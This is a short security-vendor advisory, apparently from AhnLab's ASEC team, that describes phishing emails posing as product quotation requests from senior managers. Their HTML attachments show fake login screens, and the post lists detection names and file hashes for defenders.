The ASEC analysis team has recently been monitoring phishing emails with content related to requests for product quotations. These phishing emails are all disguised to seem as if they were sent by a manager with a high position, such as the team leader or department director of production companies or foundries. There were also .html and .htm attachments. This post will cover the two major phishing emails disguised as quotation requests. For convenience, these emails will be referred to as Phishing Email 1 and Phishing Email 2.
Figure 1. Phishing Email 1 in circulation
Figure 2. htm attachment
Opening the .html attachment in Phishing Email 1 displays a screen that asks the user to log in to their account. Like the content of the email that requests a quotation for products, it is made to seem like a spreadsheet with content involving ‘orders’.
Figure 3. After logging in
An arbitrary attempt to log in results in tunneling to an image in Google Docs. The content of Phishing Email 2 is as follows.
Figure 4. Phishing Email 2 in circulation
Phishing Email 2 also includes content about requesting product quotations inside the attached .htm file.
Figure 5. Account login screen of the attachment
Opening the .htm attachment displays a login screen for email accounts as shown in Figure 5. Phishing emails disguised as product quotation requests commonly ask users to log in to their accounts in the attached file. Phishing emails with keywords such as resumes, purchase orders, and quotation requests like this case are continuously being distributed. Users must practice caution against reading phishing emails with these words in the subject.
[File Detection]
- Phishing/HTML.Agent
- Phishing/HTML.Generic
[IOC Info]
- Attachment in Phishing Email 1: 51E6BCFBB2B6F5E6563F051E095ACCBE
- Attachment in Phishing Email 2: 77128F8261C73FAF4FD62EC65B31821D
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
Categories:Malware Information